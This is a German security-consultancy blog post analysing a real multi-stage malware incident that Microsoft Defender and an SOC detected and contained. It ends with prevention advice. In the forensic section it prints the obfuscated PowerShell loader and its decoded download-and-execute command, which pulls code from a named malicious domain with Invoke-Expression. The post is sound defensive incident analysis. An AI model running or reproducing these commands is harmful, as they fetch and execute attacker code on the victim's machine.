• Link zu X
  • Link zu Xing
  • Link zu LinkedIn
  • Link zu Instagram
  • Link zu Youtube
Webinare: 16.05. Zero Trust: der neue Standard | 16.05. Microsoft Copilot erfolgreich starten | 06.06. MDM mit Microsoft Intune > Infos & Anmeldung
Net at Work
  • Microsoft 365
    • Workshops
    • Microsoft Teams
    • Telefonie
      • Microsoft Teams Telefonie
      • Contact Center
      • Managed SBC
    • Microsoft Exchange
    • Microsoft SharePoint
    • M365 Migration
    • Security
      • Microsoft 365 Security
      • SOC
      • E-Mail Security
    • Microsoft Power Platform
    • Microsoft Copilot
    • Informationsmanagement
    • Wissensmanagement
  • Business Apps
    • Microsoft Development
    • Individuelle Softwareentwicklung
  • Intranet
  • Managed Services
  • Change Management
  • Unternehmen
    • Kontakt
    • Über uns
    • Referenzen
    • Karriere
      • Fach- und Führungskräfte
      • Junge Talente
  • Blog
  • Online Events
  • Click to open the search input field Click to open the search input field Suche
  • Menü Menü
  • Cyberangriff Beispiel – detaillierte Analyse eines echten Angriffs

Cyberangriff Beispiel – detaillierte Analyse eines echten Angriffs

Maarten Liphardt, Junior Consultant Microsoft Security
Autor: Maarten Alexander LiphardtJunior Consultant Microsoft Securityhttps://www.linkedin.com/in/maartenliphardt/–Auf LinkedIn vernetzen

Cyberangriffe werden immer raffinierter, Unternehmen stehen vor der Herausforderung, Sicherheitsvorfälle frühzeitig zu erkennen und zu stoppen. Oftmals bleibt eine Kompromittierung unentdeckt, bis bereits sensible Daten abgeflossen oder Systeme nicht mehr funktionsfähig sind. Aber wie können Sie verhindern, dass ein einzelner Angriff Ihr gesamtes Netzwerk gefährdet? Hier kommt ein Security Operations Center (SOC) ins Spiel: Ein SOC analysiert verdächtige Aktivitäten in Echtzeit, erkennt Bedrohungen und reagiert sofort. Ohne ein solches Überwachungs- und Abwehrzentrum bleiben viele Cyberangriffe zu lange unbemerkt – mit potenziell schwerwiegenden Folgen. In diesem Artikel zeigen wir anhand eines realen Vorfalls, wie ein SOC Angriffe einstuft und welche Maßnahmen helfen, Ihr Unternehmen nachhaltig zu schützen.

Der Vorfall: Multi-Stage Cyberangriff über JavaScript Datei

Der Vorfall begann mit einer Microsoft Defender Alarmierung durch einen gruppierten „Multi-Stage“ Incident, der häufig in Verbindung mit bekannten Angriffstaktiken gemeldet wird. Das Defender Portal wies auf einen auffälligen JavaScript-Prozess hin, der vermutlich bekannte Techniken zur Datenexfiltration über Windows Management Instrumentation (WMI) und PowerShell genutzt hat.

  • Defender Portal Incident Übersicht

    Cyberangriff Beispiel Analyse: Defender Portal Incident Übersicht
  • Defender Portal – MintLoader Activity

    Cyberangriff Beispiel Analyse: Defender Portal - MintLoader Activity
Zurück Zurück Zurück Weiter Weiter Weiter
12

Erste Reaktion: Isolierung des betroffenen Endpunkts

Unser SOC-Team erkannte die Bedrohung sofort und isolierte sowohl das betroffene Gerät als auch den zugehörigen Benutzer. Damit wurde ein möglicher Command-and-Control (C&C)-Zugriff verhindert und eine weitere Verbreitung im Unternehmensnetzwerk unterbunden.

Forensische Analyse: verdächtiger PowerShell-Befehl

Der zugehörige „Suspicious PowerShell command line“-Alert im Defender Portal wird ausgelöst, wenn PowerShell-Befehle an einem Endpunkt ausgeführt werden, die der Defender nicht klar als ungefährlich einstufen kann. Der Alert enthielt im konkreten Beispiel folgenden PowerShell-Befehl:


c$($ohzytakfucrqdn)l;$ivudkpgm=(8102,8107,8110,8113,8103,8097,8104,8096,8093,8099,8107,8104,8042,8111,8101,8112,8097,8043,8045,8042,8108,8100,8108,8059,8111,8057,8098,8104,8101,8094,8093,8094,8095,8046,8046);$fuhdbmyvr=('ertigos','get-cmdlet');$ciftrhqj=$ivudkpgm;foreach($fgjnayi in $ciftrhqj){$evyfqhbualdicz=$fgjnayi;$mauvkg=$mauvkg+[char]($evyfqhbualdicz-7996);$rsawxqnd=$mauvkg; $acbjzwrfqoekh=$rsawxqnd};$kpjqtosvig[2]=$acbjzwrfqoekh;$bslzrfkmvgwy='rl';$cwtglzv=1;.$([char](((200 + 30) - (100 + 25)))+'ex')(protons -useb $acbjzwrfqoekh)

Aus der Beweismenge des Defenders luden wir uns die originale JavaScript-Datei herunter. Auch in dieser vollzogen wir das Vorgehen des Programms nach und konnten denselben PowerShell-Codeblock extrahieren.

Der decodierte Codeabschnitt beinhaltet eine PowerShell-Code-Ausführung über WMI Tools – eine bekannte Technik zur Umgehung von Sicherheitsmechanismen. Microsoft Defender hatte dies korrekt erkannt und entsprechend Alarm geschlagen.

Aufdeckung der eigentlichen Payload

Durch eine schrittweise Entschlüsselung des Codes extrahierten wir den eigentlichen Angriffsbefehl:


.$(iex curl -useb jorukeldagol.site/1.php?s=flibabc22)

Die Auflösung der Abkürzungen ergab:


Invoke-Expression (Invoke-WebRequest -UseBasicParsing -Uri "http://jorukeldagol.site/1.php?s=flibabc22")

Dies bedeutet, dass die PowerShell-Ausführung externen Code von einer nicht vertrauenswürdigen Quelle herunterlud und ausführte – ein klares Indiz für eine Kompromittierung. Zudem fand der Zugriff unverschlüsselt über http statt, was ebenfalls ein Indiz für einen bösartigen Akteur darstellt. Den Internetzugriff vollzogen wir auch im Defender im Advanced Hunting nach:

  • Advanced Hunting DeviceNetworkEvents

    Cyberangriff Beispiel Analyse: Advanced Hunting DeviceNetworkEvents

Hinter der URL befand sich folgender Code im Klartext (Abbildung 1 unten). Auch dieser Code ist stark verschleiert. Unsere Analyse zeigte, dass erneut ein „Invoke-Expression“-Befehl ausgeführt wurde, gefolgt von folgendem weiteren Code (Abbildung 2). Entwickler erkennen hier bereits ein deutlich klareres Muster als in den vorherigen Codeblöcken. Unsere Analyse führte zudem zu einer leserlichen Variante des Codes (Abbildung 3).

  • 1 – Verschleierter PS Code

    Cyberangriff Beispiel Analyse: 1 - Verschleierter PS Code
  • 2 – Verschachtelter PS Code

    Cyberangriff Beispiel Analyse: 2 - Verschachtelter PS Code
  • 3 – Analysierter PS Code

    Cyberangriff Beispiel Analyse: 3 - Analysierter PS Code
Zurück Zurück Zurück Weiter Weiter Weiter
123

Hier zeigt sich, dass der Schadcode verschiedene Systemspezifikationen ausliest, offenbar um sein Verhalten an die Umgebung anzupassen. Dazu gehören Abfragen, ob das System in einer virtuellen Maschine läuft oder welcher Grafikkarten-Typ genutzt wird. Diese Technik wird oft verwendet, um Sicherheitsanalysen in Sandbox-Umgebungen zu umgehen. Zusätzlich wurde der Cache-Speicher überprüft, vermutlich um weitere Unterscheidungsmerkmale des Systems zu erfassen.

Die gesammelten Systeminformationen fließen in die Generierung einer spezifischen URL ein, die anschließend für die Ausführung eines weiteren Invoke-Expression-Befehls genutzt wird. Dies deutet darauf hin, dass basierend auf den ermittelten Parametern eine für das jeweilige System optimierte Schadsoftware nachgeladen wird. Dieses Vorgehen ermöglicht es dem Angreifer, gezielt zwischen verschiedenen Payloads zu wählen, etwa um Erkennung durch Sicherheitslösungen zu umgehen oder Funktionen an die Systemumgebung anzupassen.

Blockierung und Schadensbegrenzung

Entscheidend war anschließend der proaktive Netzwerkschutz durch den Defender, der den Zugriff auf die generierte URL blockierte. Damit verhinderte dieser die Ausführung weiterer bösartiger Befehle. Auch dies lässt sich über die gemeldeten Aktionen nachvollziehen:

  • Advanced Hunting DeviceEvents

    Cyberangriff Beispiel Analyse: Advanced Hunting DeviceEvents

Ein Analysieren der folgenden Geräteaktionen, einsehbar durch die Defender Device Timeline, bestätigte, dass nach dieser Blockierung keine weiteren PowerShell-Aktivitäten stattfanden. Der fehlgeschlagene Zugriff auf die URL führte zur Beendigung der Malware, die keine weiteren Elemente enthielt.

Um jegliches Restrisiko zu eliminieren, setzten wir den betroffenen Endpunkt vollständig zurück. So stellten wir sicher, dass keine Fragmente des Angriffs auf dem System verbleiben oder in der Analyse übersehen werden. Dank zentraler Datenhaltung in SharePoint war ein Datenverlust nicht zu befürchten, und das Gerät konnte nach einer Neuinstallation sicher in die IT-Umgebung zurückgeführt werden.

Präventive Maßnahmen: Cyberangriffen vorbeugen

Zur Minimierung zukünftiger Angriffsrisiken empfehlen wir unseren Kunden folgende Maßnahmen:

  • Application Control & Whitelisting

    Einschränkung der PowerShell-Nutzung auf signierte oder explizit erlaubte Skripte.

  • Attack Surface Reduction (ASR) Regeln

    Einschränkung von Skriptausführungen und verdächtigen Zugriffsmechanismen.

  • Network Protection

    Sicherstellen, dass die Defender Network Protection aktiv ist, um verdächtige Webzugriffe zu blockieren.

  • Einsetzen eines SOCs

    Ein Security Operations Center überwacht die Infrastruktur und agiert in Verdachtsfällen schnell und zuverlässig, um Sicherheitsrisiken zu minimieren ohne den laufenden Betrieb mehr als erforderlich zu stören.

  • Awareness-Schulungen

    Mitarbeitende regelmäßig über Phishing- und Social-Engineering-Techniken sensibilisieren.

Fazit

Dieser Vorfall zeigt, wie wichtig ein Security Operations Center im Zusammenspiel mit einer gut konfigurierten Sicherheitsumgebung ist, um Angriffe frühzeitig zu erkennen und zu unterbinden. Microsoft Defender hat dank der richtigen Konfiguration zuverlässig Alarm geschlagen und den Cyberangriff letztendlich erfolgreich gestoppt.

Die kontinuierliche Überwachung der Sicherheitsereignisse durch ein SOC und die fortlaufende Weiterentwicklung der Sicherheitsmaßnahmen ist essenziell, da Angreifer ihre Methoden ständig anpassen. Ein mehrschichtiger Schutzansatz mit präventiven, detektiven und reaktiven Maßnahmen ist daher unerlässlich, um moderne Bedrohungen effizient abzuwehren.

Kostenfreie Webcasts für mehr IT-Sicherheit

Unsere Security Webcasts liefern Ihnen praxisnahe Einblicke und Best Practices rund um die moderne IT-Sicherheit mit Microsoft-Technologien – direkt von unseren Experten:

09.05.25 Phishingresistente Authentifizierung

Der Weg zu einer passwortlosen Zukunft mit MFA, Windows Hello und FIDO – sicher und benutzerfreundlich.

16.05.25 Firewall ade

Warum klassische Firewalls nicht mehr reichen – und wie Sie mit Zero Trust eine moderne, netzwerkunabhängige Sicherheitsarchitektur ermöglichen.

06.06.25 Effizientes Mobile Device Management (MDM) mit Microsoft Intune

iOS & Android sicher und compliant verwalten – ohne Produktivitätsverlust.

Melden Sie sich jetzt an und stärken Sie Ihre Cyberabwehr:

Forward Forward Infos und Anmeldung

Weitere News zu diesem Thema

Verwaltung von iPhones mit Microsoft Intune und Apple Automated Device Enrollment Preview

Verwaltung von iPhones mit Microsoft Intune und Apple Automated Device Enrollment (ADE)

News IT-Betrieb, News Kompetenzen, News Microsoft Microsoft 365, News Security
Weiterlesen
2016-02-17
Seite 21 von 21«‹192021

Pressekontakt

Aysel Nixdorf, Marketing Managerin bei Net at Work.
Gerne stehe ich Ihnen bei Fragen zu Net at Work und unserem Angebot jederzeit zur Verfügung. Sprechen Sie mich an.

Aysel Nixdorf
Marketing & PR
Telefon +49 5251 304627

Kostenfreier Beratungstermin

Wird geladen

Newsletter

Jetzt abonnieren

Jetzt Beitrag teilen!

  • teilen 
  • teilen 
  • teilen 
  • E-Mail 

Unternehmen

  • Profil
  • Kontakt
  • Karriere
  • Impressum
  • Datenschutzerklärung
  • Allgemeine Geschäftsbedingungen (AGB)
  • Datenschutzinformation für Geschäftspartner und Bewerber

Kompetenzen

  • Microsoft 365
  • Microsoft 365 Change Management
  • Managed Services Provider
  • Microsoft Teams
  • Microsoft Teams Telefonie
  • Microsoft Teams Contact Center
  • Microsoft 365 Security
  • Microsoft Copilot
  • Microsoft Azure
  • Microsoft SharePoint
  • Microsoft Exchange
  • Microsoft Power Platform
  • Informationsmanagement
  • Intranet
  • E-Mail-Sicherheit

Microsoft Solutions Partner Modern Work

Microsoft Solutions Partner Security

News

  • Newsletter abonnieren
  • Kompetenzen
  • Unternehmen
  • Termine
  • Alle News

Letzte News

  • Unassigned Numbers clever managen in der Microsoft Teams Telefonie2025-05-13 - 10:00
  • Defender External Attack Surface Management Preview
    Defender External Attack Surface Management: So verwalten Sie externe Ressourcen2025-05-09 - 10:00
  • Great Place To Work – Net at Work zählt zu den Top 30 der besten Arbeitgeber in Deutschland
    Great Place To Work – Net at Work zählt zu den Top 30 der besten Arbeitgeber in Deutschland2025-04-28 - 10:16
IMPRESSUM • Datenschutzerklärung •  • © 2025 Net at Work GmbH
  • Link zu X
  • Link zu Xing
  • Link zu LinkedIn
  • Link zu Instagram
  • Link zu Youtube
Nach oben scrollen Nach oben scrollen Nach oben scrollen